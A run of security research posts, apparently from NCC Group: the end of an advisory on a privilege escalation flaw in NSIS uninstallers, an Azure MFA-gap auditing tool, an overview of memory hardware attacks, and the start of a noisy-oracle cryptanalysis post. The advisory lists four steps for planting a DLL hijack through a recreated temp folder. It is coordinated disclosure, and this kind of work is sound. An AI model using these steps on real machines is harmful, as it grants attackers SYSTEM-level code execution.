sub-directory under the current user’s %TEMP% folder. It then copies itself to this directory before executing the a new temporary executable with CreateProcess. However, the uninstaller executable does not protect this temporary directory from removal when it has been launched from a privileged context. Additionally, it ignores the ERROR_ALREADY_EXISTS code returned by CreateDirectory, and applies an overly-permissive ACL to the existing directory instead.

This allows users in the Everyone group permission to delete the folder and re-create it with malicious content.

A malicious user could exploit these weaknesses to create a “poisoned” temporary directory containing a payload – which would get executed by the uninstaller. Looking at the nsis-3.08 source code, we can find the following line in Source\exehead\Main.c

On line 352, the program makes a call to UserIsAdminGrpMember and sets the admin variable to the return value. The UserIsAdminGrpMember function calls the shell32!IsUserAnAdmin Windows API function.

This function is simply a wrapper for SHTestTokenMembership, which checks that the user’s token contains the RID 0x220 (i.e. SID S-1-5-32-544 (BUILTIN_ADMINISTRATORS)).

If an uninstaller is launched as SYSTEM, it will pass the UserIsAdminGrpMember function, which the uninstaller.exe process token will contain the administrator SID. Furthermore, its %TEMP% and %TMP% variables will be set to the global C:\Windows\Temp temporary directory (via a call to GetTempPath), which all users have Write access to.

As such, the NSIS code will go on to call the CreateRestrictedDirectory, as the value of admin will be 1 . However, if we look at the code for this function, we can see that the ACL applied using SetFileSecurity includes an ACE which allows Everyone to have DELETE permissions.

Additionally, in the CreateRestrictedDirectory, although the CreateDirectory return code is checked for the ERROR_ALREADY_EXISTS return code, it does not re-create the folder. Instead, it applies the permissive ACL to the existing folder. This means that if the folder already contains malicious content, it will not be removed.

The NSIS uninstaller does attempt to remove any existing Un_X.exe executables from the
~nsuA.tmp folder. However, any other content will be left in place.

There is also a potential TOCTOU issue, since CopyFile is used to write the Un_X.exe file, no exclusive handle is maintained on the file. Therefore an attacker may be able to race between when the file is written with CopyFile and when it is launched with CreateProcess. The attacker could potentially improve their chances of winning this race by using oplocks.

Exploitation

Whilst it is tricky to exploit a race-condition, and DLL Hijacking is generally mitigated by the use of SetDefaultDllDirectories in NSIS – another way to exploit this vulnerability would be to abuse Windows Side-by-Side (WinSxS) assembly loading and DotLocal redirection.

This is a relatively lesser-known technique that allows us to create a DLL hijacking primitive by creating a .local folder in the executable directory. DotLocal abuse has been documented and exploited previously by multiple researchers, and is used in the UACME UAC bypass tool.

As mentioned earlier, an attacker can delete the C:\Windows\Temp\~nsuA.tmp folder and re-create it with their own chosen permissions. Once the folder has been re-created with write permissions, the attacker can create an Un_A.exe.local sub-directory inside the ~nsuA.tmp folder. This will cause Windows to attempt to load SxS assemblies from this folder – which is controlled and write-able by the attacker.

In the following screenshot we can see the Un_A.exe process attempting to open the .local directory under normal usage:

If we delete the ~nsuA.tmp folder, re-create it with weak permissions, and create the .local folder sub-directory described above, we can see it now attempts to open the C:\Windows\Temp\~nsuA.tmp\Un_A.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e subdirectory from a .local folder:

If we create the amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e sub-directory too, then it will finally attempt to load the comctl32.dll library, giving the attacker a DLL hijacking primitive:

Therefore, to exploit this issue, an unprivileged attacker simply has to:

  1. Delete any existing C:\Windows\Temp\~nsuA.tmp folder
  2. Recreate the folder with Read/Write permissions
  3. Create the .local SxS redirection subfolder containing a malicious COMCTL32.dll file
  4. Trigger the uninstaller.exe process to run as a privileged (e.g. SYSTEM ) user (this will be product specific – e.g. RPC/COM).

This would give the attacker code execution within the Un_A.exe process, which runs with the same privileges as the uninstaller.exe process.

Proof of Concept

Whilst a full Proof of Concept is not provided, some example code can be found here which shows how to determine the required SxS folder name.

The following screenshot shows the PoC being run against a simple test NSIS package.

  • At 1: the PoC exploit is run, creating the neccessary folder structure.
  • At 2: the folder structure shows ~nsuA.tmp directory, and the .local folder containing the SxS DLL Hijack.
  • At 3: the uninstaller.exe package is run under the SYSTEM account using PSExec (for example purposes).
  • At 4: the DLL hijack is triggered, resulting in a new cmd.exe Window being spawned as SYSTEM.

Affected Software

We have identified multiple products using NSIS where this vulnerability is exploitable and leads to privilege escalation.

If your software package makes use of NSIS versions prior to 3.09 and allows a low-privileged user to initiate an uninstall operation from a privileged context; for example, auto-updaters, or software which uses a service for maintenance tasks (e.g. repairing an application install) – then it is likely be exploitable.

Furthermore, if your software can be (un)installed through a deployment service such MDM or Configuration Management software, then it may also be exploitable via this vulnerability – as many of these products install software packages as SYSTEM.

The Patch

A proposed patch was provided to the NSIS project maintainers, which removed the permissive ACE allowing all users to delete the temporary directory, and added error handling to delete the directory if it already existed.

This was reviewed by the project maintainers and multiple fixes were implemented, which:

  • Creates an isolated temporary directory for each uninstaller process, deleting any existing directories if present.
  • Checks that the temporary directory does not contain a symlink before deleting it.
  • Removes the permissive ACL.

These fixes were released in NSIS version 3.09.

Report Timeline

2023-02-08 - Reported to NSIS Maintainers
2023-02-22 - Confirmation from maintainers, and patch provided for review
2023-05-21 - Initial patch committed to NSIS project
2023-05-30 - Feedback provided by NCC regarding proposed patch
2023-06-03 - Additional hardening added
2023-05-05 - Further feedback provided about patches
2023-06-21 - Additional hardening added
2023-07-01 - NSIS version 3.09 released
2023-07-11 - NCC Group advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-07-11

Written by:  Richard Warren

Getting per-user Conditional Access MFA status in Azure

Introduction

Long time has passed since Microsoft implemented the first Multi-Factor Authentication (MFA) approach in Azure Active Directory with the Per-user MFA functionality [1]. However, this simple on/off mechanism has been replaced over time by the Conditional Access Policy (CAP) feature, which was released on July 2016.

A conditional access policy is a set of conditions which, if matched, enforces its access controls to the assigned users if they try to access to the scoped applications. Access controls can block access directly, or grant access if some checks are met, such as the user completing the MFA validation or the accessing device being compliant. Users can be assigned individually, through security groups, or through roles.

Conditions within a conditional access policy are AND-wise. This means that the policy will apply only in those cases where all the conditions specified match. Some of these conditions have fixed values, while others such as device filters are more customizable. Also, conditions such as Locations and Device platforms have two lists: one for inclusions and other for exclusions.

However, conditions are not the only piece in determining whether a conditional access policy applies to a given user or not. Scoped applications could be set from the All cloud applications setting, which covers any access to the AAD controlled applications including the Microsoft 365 ecosystem, to single applications. There is even a choice of scoping by user actions and authentication contexts instead of applications.

Finally, it is worth noting how CAPs interact among them. Basically, if a sign-in event from a given user is covered by more than one CAP, all of them apply. This means that all the grant access controls among the applying policies will be requested (MFA, device compliance…). Policies configured with the deny access control have priority and the access will be just denied if at least one of these applies [2].

All these variables provide great granularity to the CAP feature, but this flexibility comes with a cost: there can be so many factors to consider when evaluating if a user will be asked to comply with the access controls, that there is no option to check if users have MFA enabled or not in an easy way, like the per-user MFA was. For example, one could find situations in which the same user is asked to perform multi-factor authentication if they try to sign-in to Exchange using a web browser, but not with the Desktop client. Such situations are known as ‘gaps’, which may grow exponentially as a given tenant contains more users, groups, and conditional access policies.

Tools to assist in determining the MFA status

Currently, there are a few tools that may help in the task of identifying gaps coming from conditional access policies, each following a different approach:

  1. Azure Portal: sounds obvious, but Azure Portal provides a good insight of the overall MFA status. The Overview section in the Conditional Access blade offers security alerts that includes the percentage of sign-ins out of scope of CAPs and the percentage of sign-ins lacking MFA. Also, the sign-in logs in the same blade is quite useful to filter sign-ins by authentication requirements, and each entry can be drilled-in to analyse which CAPs were applied and which ones were not. However, it is limited to data generated by sign-ins in the last month period, meaning that it could miss MFA conditions if users did not login in that period, or if they already have a session opened that does not require re-authentication.
  2. Conditional Access Gap Analyzer Workbook [3]: a tool aimed for IT Administrators that works similar to the Azure Portal. The main difference is that sign-in logs are stored in a Workspace Analytics resource, solving the time-limited problem that is present in the portal. Results are still non-deterministic since it relies on sign-in events. From the auditor’s position, this tool cannot be used since it requires a resource to be created in advance, unless agreed beforehand.
  3. Azure AD Assessment [4] and Monkey365 [5]: although these tools are totally different, they follow the same approach regarding CAP analysis. In this case, the tools access to the tenant CAPs directly and determine if some best security practices have been applied, such as the existence of a CAP for every user and another for Global Administrators, but they do not include gap analysis.
  4. CAOptics [6]: this tool was designed for CAP gap analysis specifically using a smart approach: it retrieves the tenant CAPs, then it generates permutations to represent each set of conditions for each CAP and affected user, group or role, indicating if the permutation has a termination (it is covered by one or more CAPs) or not. These permutations are then merged and gaps are exposed in form of unterminated permutations.
  5. Azure-AD-Password-Checker [7]: a script that uses a genuine approach to raise potential MFA gaps by getting each user creation date and password change date, then comparing those in search of anomalies that represent a lack of MFA configuration by the user.

Per-user conditional MFA tool

From an auditor’s point of view, it would be really interesting to be capable of getting a deterministic, accurate report of the MFA status for each user in a target tenant. From the tools explained above, the only ones that can be catalogued as deterministic are Azure AD assessmentMonkey365 and CAOptics. The latter is the only one in this category that also focus on raising gaps, but its output is not per-user oriented.

This situational information is useful not only for customers from a defensive perspective, but also for attackers, even more now that Microsoft just enforced number matching and any attempt to access to an account with guessed credentials and MFA enabled will be quite unsuccessful.

Considering all of these, a decision was made to create a new plugin for the ROADrecon tool [8] that would receive a CAOptics report as input to generate a per-user MFA status report. There are multiple tools available for the public that already perform Azure AD security analysis, but ROADrecon was pretty good for our purpose since it implemented a plugin system and a really useful data model fed by a local database that plugin developers do not need to handle.

Transforming the input data into a per-user MFA list was not a simple task. For this reason, the plugin was designed to execute three main phases: the first one ingests the output data generated from CAOptics, the second one applies post-processing to enhance the per-user MFA status report and the last one is the output generation.

Input processing phase

The initial phase could be divided in two major steps. The first one is the input parsing and row mapping with its permutation, also called “lineage” in CAOptics. Since a per-user approach is going to be followed and the input report contains object IDs not only for users, but also groups and roles, these must be “unrolled” so that the permutation list only contains user IDs.

Unrolling groups and roles

Unrolling groups and roles may sound trivial, but Azure Active Directory does not specify a limit in the maximum depth for nesting. To make it worse, a child group can include any of its parent groups as member, generating loops in the tree that could derive in infinite lookup tasks. CAOptics already considered this situation and implemented the most efficient approach, which consists in establishing a reasonable limit of one level of depth.

Since we wanted to reach more accurate results even for “infernal” scenarios, and also considering that CAOptics was designed to not resolve role memberships into users, we decided to implement a lookup functionality to get a result that would fit better in the per-user approach.

Given an object ID, let’s call it the root node, the lookup algorithm would first check which kind of object it is dealing with. If it is a user, no action is required. If it is a group or a role, then the node is expanded, meaning that their members are retrieved as child nodes, and for each of these nodes, the same procedure is applied recursively. To prevent infinite loops, nodes that have been already expanded are cached into an expanded nodes list which is going to be checked by the recursive function before calling to itself again.

Once a root node and his children has been expanded, the final relationship is root node -> list of all its children user object IDs, which is cached into a resolved nodes cache for efficiency. This lookup procedure comes from Graph Theory and it is known as Depth-First Search (DFS).

For a given permutation being resolved, if the lookup procedure returns a list of multiple object IDs, the permutation is replaced by multiple copies of the same permutation, each containing a single object ID belonging to one of the returned users.

Determining the MFA approach

Getting the MFA status for every user also depends on the policy design, which can follow the include based or the exclude based approach. CAOptics works for the latter [9] and this must be considered when a tenant is found that follows the include based approach.

This is where the second major step in the input processing phase comes into play. Once all permutations are parsed, the plugin determines if there is a “main” MFA policy or not by examining the users:All lineage and terminations. We call the main policy to the CAP that is scoped to all users and all cloud applications. If there is such policy in place, all users are initially marked as MFA Enabled and then permutations without terminations are used to modify this status to Conditional or Disabled. When no main policy is detected, all users part from the MFA Disabled status and then their status is modified to Conditional or Enabled when examining their particular permutations.

The data model in ROADrecon already implements a strongAuthenticationDetail field for storing information about MFA, mostly focused on the legacy per-user MFA feature. The plugin extends this field with new attributes such as CapMfaStatus and CapMfaList to store the new information without overwriting the original data.

Post-processing phase

Up to this point, the plugin has a preview of the conditional per-user MFA status based in CAOptics results. However, since both tools differ from the output approach, a bit more of fine tuning is needed to make the report more accurate.

In first place, policies are processed individually to check if they have any influence or not. Those that are configured as Report only or Off are skipped. The same applies to policies that have no grant/deny controls or have an undefined scope. If a policy applies, then it is associated with every scoped user.

From that point, those conditions that have not been included in the MFA checking process are processed: authentication context scopes, devices, user risks, sign-in risks and locations conditions. If any or multiple of these configurations are detected, every user assigned to that policy will be updated to MFA Conditional status and the extra condition will be added to the report. For those users that were already marked as MFA Enabled, this process is omitted since the most restrictive policy wins.

Lastly, additional notes are added for those users that are affected by a blocking policy. To be more precise, the policy name will be appended to the blocking CAPs list of those users, but the MFA status is not updated here. This is because CAOptics already treated the blocking policies as MFA grant policies. While this may not be the most accurate approach for the plugin output, it will still reflect the MFA gaps with that extra information, which is enough for the purpose of this plugin.

Usage and output

Some prerequirements must be met before using the plugin. The first step requires getting the report from CAOptics to be used as input for the import plugin. It is important to use the --allTerminations flag, otherwise the report will not be accepted. Example of CAOptics execution line:

node ./ca/main.js --mapping --clearTokenCache --clearMappingCache --allTerminations

The report will be generated in two formats, CSV and MD. The CSV version will be used as input for the plugin.

Then we can move to ROADrecon and issue the authentication command. Currently, the plugin is only available in the plugin developer’s repository (https://github.com/acap4z/ROADtools), but a pull request to the main repository is going to be issued. It is important to note that the user must have the policy.read.all privilege assigned through a role such as Global Reader:

python .\roadrecon\roadtools\roadrecon\main.py auth --device-code

Once the tool has the authentication token, it can perform the tenant enumeration with the following command:

python .\roadrecon\roadtools\roadrecon\main.py gather --mfa

Finally, the CAOptics import plugin can be launched. By default, it will look for the CSV report in your current directory, but the path can be specified with the --input_file flag:

python .\roadrecon\roadtools\roadrecon\main.py plugin caopticsimport --input_file caoptics_report.csv

The final report will be written in a separate CSV file called output_report.csv by default, although this can be changed with the --output_file flag. There is also an option of getting a console output by specifying the --print flag, which displays a color code depending on the MFA status, but keeps additional info out such as conditions and CAP lists.

The CSV version contains more details than the printable version in the following columns:

  • User Principal Name: list of all users registered in the tenant, including guests.
  • MFA Status: the status obtained from the processing and post-processing phases for each user. Values can be:
    • Enabled: one or multiple CAPs affecting the user covers every sign-in case with MFA.
    • Conditional: the user is affected by one or more CAPs, but there are cases that are not covered by MFA.
    • Disabled: the user is not affected by any CAP that manages grant controls.
  • MFA Bypass Conditions: when a user is marked with MFA Status conditional, the gaps will be listed in this column. Note that the ones coming from CAOptics will be more precise than those detected by post-processing tasks.
  • Blocking CAPs: name of the CAPs with grant controls set to Block that affect the user.
  • Affected by CAPs: list of all CAP names that affect the user.

It is important to remark that the MFA Status reported by the plugin does not consider the legacy per-user MFA status. Thus, it is possible to find tenants in which some users are reported with MFA Status Disabled, but their MFA has been enforced in the per-user MFA configuration. Microsoft recommends switching to conditional access to prevent such confusion in the MFA management [10].

The tool is currently available at the plugin developer’s repository: https://github.com/acap4z/ROADtools

Acknowledgements

Big thanks to those workmates that helped me with this research process. Special thanks to Simone Salucci, Daniel López and Manuel León for reviewing this post and suggesting me some meaningful improvements.

References

[1] Per-user Azure AD Multi-Factor Authentication: https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates

[2] Conditional Access Policies: https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policies

[3] Conditional Access Gap Analyzer Workbook: https://learn.microsoft.com/en-us/azure/active-directory/reports-monitoring/workbook-conditional-access-gap-analyzer

[4] Azure AD Assessment tool: https://github.com/AzureAD/AzureADAssessment

[5] Monkey365 tool: https://github.com/silverhack/monkey365

[6] CAOptics tool: https://github.com/jsa2/caOptics

[7] Azure-AD-Password-Checker tool: https://github.com/quahac/Azure-AD-Password-Checker

[8] ROADtools: https://github.com/dirkjanm/ROADtools

[9] CAOptics opinionated design: https://github.com/jsa2/caOptics#opinionated-design

[10] Convert per-user MFA enabled and enforced users to disabled: https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates#convert-per-user-mfa-enabled-and-enforced-users-to-disabled

Overview of Modern Memory Security Concerns

This article discusses the security concerns which must be taken into account whenever designing an embedded system. Failure to account for these security concerns in the system’s threat model can lead to a compromise of the most sensitive data within.

Memory is a crucial part of any computer subsystem. The CPU executes instructions and operates on data, but all that code and data needs to exist somewhere. This is the role of the memory, which comes in many forms. We often talk about the size, performance, and power consumption characteristics of memory, but the security properties can be important as well, and are often overlooked. We will focus on the security properties of the memories themselves and not delve too much into system-level vulnerabilities such as DMA attacks and memory safety which are already well-covered elsewhere.

Figure 1: Early core memory (ferrite donuts with hand woven read/write lines) sent people to the moon (image courtesy of Wikipedia)

Memory technologies can broadly be divided into two categories, non-volatile and volatile. Volatile memory requires power to maintain its contents, while non-volatile memory does not. Volatile memory, such as RAM, is often used for temporary storage of data that needs to be quickly accessed and processed by a computer. It is useful for storing data that is likely to change frequently, as it allows for quick modification. On the other hand, non-volatile memory is used for long-term storage of data that does not need to be modified as frequently, and needs to be stored across power cycles. It is useful for storing data that is not likely to change, such as firmware and user data.

Volatile Memory Technologies

In ancient systems, volatile memories were built from vacuum tubes, ferrite cores (Figure 1), or transistor flip-flops. In modern systems, this role is served by Random Access Memory (RAM). This generally comes in two flavors, Static RAM (SRAM) and Dynamic RAM (DRAM), and most systems will contain both in various quantities to accommodate the performance, power, and size (both physical and logical) needs of the system.

For volatile memory of all types, confidentiality and integrity are the main security properties of concern. The ability of an attacker to maliciously read/write the contents has traditionally been the domain of software vulnerabilities such as memory safety issues. But we’ve seen the emergence of techniques that leverage hardware issues to achieve the same thing. Physical attacks are the most straightforward, especially when the hardware may be deployed in hostile environments (eg. edge computing), vulnerable to temporary access by an attacker (eg. a supply chain interdiction, or “evil maid“), or whenever the device may be easily lost, stolen, or confiscated (as in the case of mobile devices). Many of these known vulnerabilities are also exploitable by a local attacker on the system who may attempt to escalate privileges, and some of these are even exploitable remotely over the network.

In all cases, the solutions typically involve encrypting data (preferably using non-malleable ciphers, though this is uncommon for performance reasons), however performance overhead is an oft-cited concern unless the memory controller implements the encryption in hardware. You also need a safe place to store your memory encryption keys, which can itself be a challenge (typically solved by generating and storing the key within the SoC and accessible only to the memory controller itself). For microcontrollers with built-in RAM, directly accessing the bus is a much harder challenge for an attacker; however, many such devices have other ways to access the internal memories through debug functionality, which brings a new set of security concerns related to access control.

SRAM

A typical single SRAM cell consists of six transistors (Figure 2): a pair of inverters arranged in a feedback loop to store a value, and gated connections to the row and column lines for reading and writing. This allows each cell to be addressed individually and quickly, but consumes energy the entire time the cell is powered, and takes up more area on a silicon die than a DRAM memory cell. Its use is most often limited to high speed memories within an SoC or microcontroller (caches, and other internal RAMs) and it is often sized in kilobytes or megabytes.

The startup value of an SRAM cell will contain a bias due to the unstable balanced nature of the inverter feedback loop (i.e. whichever inverter powers up faster will win). This bias is somewhat random and can be exploited to develop a useful physically unclonable function (PUF) on which to build higher level security features. The bias can however, be altered by ionizing radiation and annealing. This can affect the security guarantees of a PUF. Annealing can also be dependent on the current state of the SRAM. This may allow an attacker to effectively freeze the current SRAM contents, and similar to a cold boot attack on DRAM (discussed below), allow an attacker to recover its contents at a later time.

Intentionally causing bit-flips within memory can be achieved through a variety of advanced techniques including voltage and clock glitching, electromagnetic pulses (EMP), optical fault injection using infrared lasers, and various forms of ionizing radiation. All of these have the effect of altering data, and if done carefully could alter the behavior of the system in ways that are desirable to the attacker. Frequently, the attacker’s goal is to subvert a low-level security control, such as secure boot, debug re-enablement, or a vital authentication scheme.

Figure 2: SRAM (left) and DRAM (right) cell designs. 

DRAM

A DRAM cell consists of a single capacitor (Figure 2) which can passively (i.e. without power) store an amount of charge (an analog value enabling multiple bits per cell), and a single transistor to connect this to the row and column lines. While this simplicity offers much higher density (therefore higher storage capacity) and lower power than SRAM it comes with a number of tradeoffs. Parasitic leakage of charge into the substrate causes the stored value to degrade over time (on the order of seconds). This is overcome by periodically refreshing the stored values on every cell, a necessary interruption which can limit the performance of the overall system. Similarly, the simple design requires that all cells in a row be read together as a stream, an operation which disturbs the stored charge, requiring that it be written back again. These performance impacts are most often remedied by pairing DRAM with a faster but smaller SRAM for caching purposes.

The tightly-packed nature of DRAM is also the cause of some serious security concerns. Crosstalk (electromagnetic interference) between rows within the extremely dense DRAM memory becomes a concern, and researchers have developed techniques for exploiting this called RowHammer and RAMBleed. These vulnerabilities allow a local attacker on the system or a remote attacker (see ThrowHammer/NetHammer variants) to write (RowHammer) and read (RAMBleed) memory that they do not have permission for by repeatedly accessing, or hammering, adjacent memory rows. Any system using DRAM is vulnerable (including Error Correction Code (ECC) memory), yet there is no 100% defense. The best defense strategy currently relies on detection of active rowhammer attacks with a targeted row refresh (TRR), but these are optional and not yet widely deployed. Many proof-of-concept demonstrations are publicly available and it is only a matter of time before we see these attacks being used by malware in the wild.

For physical attacks, the same interposers that enable engineers to investigate memory signal issues also allow an attacker easy access to the memory bus between the host processor and the memory. Cold Boot attacks exploit the relatively slow data decay when the DRAM memory is unpowered, and this time can be extended to minutes/hours using cold temperatures. Techniques have been developed to apply this attack even to soldered-down memories.

Hybrid Memory Cube (HMC) and High Bandwidth Memory (HBM)

HMC and HBM are sophisticated uses of DRAM technology that achieve much higher performance for memory intensive applications, primarily through reduced latency and higher parallelism. Importantly for security, these devices contain additional controller elements (with yet more complex firmware) that must be robust and secured from attackers.

Non-Volatile Memory Technologies

Non-volatile memory stores the data and code persistently when the power is off.  These come in an even wider array of options. Historically, various forms of magnetic media were used, including tapes, floppy disks, and spinning hard drives. These all require mechanical components which themselves are subject to normal wear and failure. Malicious wear can cause Denial-of-Service attacks in all types of persistent memory.

Solid state devices have some distinct advantages with respect to performance, power, and mechanical reliability. These devices are mostly based on storing charge using various microscopic semiconductor cell designs. Read-only Memory (ROM) comes in a number of forms and is often programmed during semiconductor fabrication. It is of limited utility in applications with dynamic content. Programmable ROM (PROM) allows a single programming operation to occur (eg. by an OEM device maker) and is otherwise similar to ROM. Erasable PROM (EPROM) are slightly more versatile in that they can be erased by UV light and reprogrammed which allows some level of manual field upgradeability. Electrically erasable PROM (EEPROM) and flash memory are fully in-circuit erasable due to the use of internal charge pumps and other devices. Flash memory is the most common solid state device you will find in almost all modern electronics.

Figure 3: Microcontroller with UV erasable EPROM window

From a security perspective, non-volatile memories have all the same concerns with bus access as does RAM, but they are more pronounced because of the lower pin count and lower speeds. This makes it easier for an attacker to access without expensive equipment.  Moreover, thanks to the persistent nature of the memory, you have additional attacks to worry about:

  1. Offline (or “chip-off”) attacks, like cold-boot attacks on RAM, are where the memory is simply removed from the device and read/modified using an off-the-shelf flash reader, an operation that takes only minutes for practiced hands.
  2. Denial of service attacks due to malicious premature wear. Modern flash devices are only rated for 10k (or fewer!) erase cycles before they need replacement. When embedded in a product rather than say a removable micro-SD card, this can be devastating.
  3. NAND (very common) flash technology achieves great density but suffers from expected failure rates, and so requires bad block management and wear leveling algorithms. Commonly this functionality is implemented within a small microcontroller within the memory chip itself (eMMC and UFS) or within a companion storage controller chip (as in SSDs and NVMe drives). This frees the host operating system from having to tame these complexities. However, this modular design introduces exploitable data remanence concerns, and you may not know if data that should be erased is actually erased, which may lead to privacy concerns. JEDEC introduced the Secure Trim and Secure Erase commands in the eMMC 4.4 specification to help overcome this problem, however these are often slow and remain unused in the majority of embedded systems.
  4. Even when the secure erase functionality is used correctly, data might still be recoverable due to analog threshold effects. NIST provides media sanitization guidance that’s applicable to flash memory as well as magnetic media, and of course, physical destruction is effective.
  5. Ordinarily flash devices are intended to be erased in blocks of a particular size (tens or hundreds to kilobytes at a time). EEPROM and EPROM devices are similarly intended to be erased as a whole unit. Systems that rely on these properties might be vulnerable to abuse when smaller regions, even single bytes, are selectively erased, which might for example, allow the bypass of some security features.
  6. Finally, when the flash reaches end-of-life, its behavior is completely implementation defined. Some flash manufacturers choose to simply freeze the contents in place as a permanent record with no capability to erase, requiring physical destruction of the chips by security conscious users.

RPMB

Some memories (eMMC, UFS, SD, NVMe) can include a Replay Protected Memory Block (RPMB). This special data partition cannot be written or modified without knowledge of the provisioned secret key. Read protection can be further provided by encrypting the data. The secret key must be known to the host SoC and stored safely. It must be programmed into the memory chip (usually by the host firmware on first boot) in a secure environment because this operation itself is vulnerable to snooping. A common attack is to replace a provisioned memory chip with a new blank part, which may cause a careless host to provision the blank part with the same RPMB secret used on the original memory part, thus revealing it to the attacker. The SoC must treat the provisioning operation as a one-time event to avoid this.

Hybrid and Exotic Memory Technologies

It’s worth discussing a few other related technologies that do not cleanly fit into the above categories.

Battery-Backed RAM

RAM is sometimes used as non-volatile storage, in concert with a small battery or supercapacitor to provide power for data retention. This is frequently seen in applications such as:

  1. A part of a tamper detection system for security sensitive devices. These systems must be able to defend themselves from an attacker even when the main system power has been cut. Securing the backup power supply to the memory may be very important to the operation of the anti-tamper subsystem, and it therefore needs to be carefully designed to be within the anti-tamper envelope itself.
  2. Always-on-power (AOP) domains within a microcontroller. Most microcontrollers and SoCs implement low power features that let the bulk of the chip go to sleep and save power, while only a tiny portion of the system remains powered in order to resume without a full boot cycle. This functionality is supported by a small low-power SRAM used to retain system state across sleep/resume operations. For performance reasons a resume operation does not perform the extensive security validations (such as secure boot) that a full system boot would. Therefore it is vital that an attacker not be able to directly write the AOP RAM state, thus tricking a device into performing a resume from sleep rather than a full boot operation.

One-Time-Programmable Fuses

Modern SoC devices contain a number of security and other configuration options that are programmed only once. These typically come in some form of OTP memory, or “fuses”, and number in the tens or hundreds of bits. Most often these are set during device manufacturing, but in some situations it may be desirable to program them in the field (for say, software roll-back prevention). These fuses can be used for any number of purposes, but common uses include disabling of security-compromising debug interfaces, enabling hardware and firmware security features such as Secure Boot, and storage of sensitive encryption keys (for use with RPMB or RAM encryption).

Attacks against the fuses most often target the software that makes use of the fuses (through fault injection, side channel leakage, or software vulnerabilities), but there are some interesting vulnerabilities that (depending on the design) may affect the fuse arrays themselves. Two examples to highlight this:

  1. Under certain conditions, programmed (“blown”) fuses can regrow, thus putting the system into a typically less-secure state. Such behavior is likely to require either privileged access to the software environment, or physically invasive techniques, and so might be of a lower concern, depending on the system threat model.
  1. Certain SoCs are designed with a separate power input for the fuse banks. This allows an external attacker with only circuit-level access to selectively control the power to the fuse banks, thereby selectively cutting the power at carefully chosen intervals to “zero-out” fuses as they are read by the hardware and firmware.

Phase Change Memory

Phase change memory uses a variety of novel materials to provide the performance characteristics of RAM with the power and non-volatility of flash memory. From a security perspective, (some of) these memories have useful properties that might be useful. In particular, the data is often erased with heat, a generally undesirable property, but which could be used as an anti-tamper mechanism to react to certain physical attacks (in particular hot-air rework). Unfortunately, while the technology has been under development for many decades, it remains a topic of intense research, with no parts currently available in commercial volumes.

Final Thoughts

Almost all modern memory devices themselves contain computing elements, microcontrollers, and firmware to tame the complexities of modern interfaces and the complicated physics of the memory technology itself. Link training, wear leveling, caching, sleep and power management, manufacturing-related test functionality, are just some examples of these complexities. This functionality is backed by deeply-embedded firmware within the memory controller. This firmware is frequently written in the C language, where memory safety concerns pose a significant risk. These concerns increase as the firmware complexity increases, driven by modern memory protocols (such as NVMe) becoming increasingly complicated. 

For memory vendors, understanding your target markets can be challenging; these are generic components and the final application and threat model is not always clear. Design for the worst case threat model, and defend against as many attacks as commercially viable. Firmware for memory controller components must be free of software defects. A robust and secure SDLC program including static analysis, security testing, and 3rd party audits can help.

We encourage device manufacturers and OEMs to probe their memory vendors. These vendors should have a good explanation as to how they avoid vulnerabilities in the vital firmware that will be deployed deep within the system. They need to have a coherent plan to maintain this firmware with ongoing security patches throughout the lifetime of a product.

When designing the system, think deeply about how an attacker might exploit the system’s memory interfaces, and design in countermeasures wherever possible. Memory encryption, careful key provisioning and management, and the selection of SoC and memory components that support the security guarantees are extremely important to get right at the earliest stages of product development.

Public Report – Zcash Zebra Security Assessment

In Spring 2023, the Zcash Foundation engaged NCC Group to conduct a security assessment of the Zebrad application. Zebrad is a network client that participates in the Zcash consensus mechanism by validating blocks, maintaining the blockchain state (best chain and viable non-finalized chains), and gossiping blocks, transactions, and peer addresses. Five consultants performed the review, in a total of 60 person-days.  The Zebra repository on branch audit-v1.0.0-rc.0 was in scope, with the following modules highlighted as the main areas of focus: zebra-chain, zebra-client, zebra-consensus, zebra-network, zebra-node-services, zebra-rpc, zebra-script, zebra-state, zebra-utils.

Exploiting Noisy Oracles with Bayesian Inference

In cryptographic attacks, we often rely on abstracted information sources which we call “oracles”. Classic examples include the RSA parity oracle attack, which depends on an oracle disclosing the least-significant bit of a ciphertext’s decryption; Bleichenbacher’s attack on PKCS#1v1.5 RSA padding, which depends on an oracle for whether a given ciphertext’s decryption is correctly padded; similarly, the famous padding oracle attack on CBC-mode encryption; or the commonly-seen MAC forgery attacks enabled by non-constant-time MAC validation.

In all of these cases, the attacker finds a way to compound small information leaks into a break of the system under attack. Crucially, in principle, the source of the leak doesn’t matter for the attack: the oracle could come from overly verbose error messages, from timing side channels, or from any other observed property of the system in question. In practice, however, not all oracles are created equal: an oracle that comes from error messages may well be perfectly reliable, whereas one which relies on (say) timing side channels may have to deal with a non-negligible amount of noise.

In this post, we’ll look at how to deal with noisy oracles, and how to mount attacks using them. The specific cases considered will be MAC validation and PKCS7 padding validation, two common cases where non-constant-time code can lead to dramatic attacks. However, the techniques discussed can be adapted to other contexts as well.

Preliminaries

Our primary tool will be Bayesian inference. In Bayesian inference, we start with a prior probability distribution for the value of some unknown quantity, and we use Bayes’ theorem to update this distribution based on experimental observations.

In our case, the unknown quantity will be a single byte, and the observed data will be the outputs of the noisy oracle. We’ll start with a uniform prior over all 256 possible values, which we will update as we make queries. We will look at a few strategies for making queries, see how they affect the resulting posterior distribution, and compare their performance.

This post is not intended as a math tutorial; readers unfamiliar with the terms used above are gently suggested to review the relevant Wikipedia articles: Bayesian inference and Bayes’ theorem. There is also a very nice video on Bayes’ theorem from 3Blue1Brown, which may be more accessible.

If you’re looking for a primer on the padding oracle attack, I also have a blog post on that topic.

Regarding the noisy oracle itself, we will assume that its noisiness is constant, and that we can measure it. These assumptions both could, in principle, be relaxed somewhat, but they simplify the presentation, and hopefully the reader who wants to generalize the given technique to the more general case will be able to see how to do so.

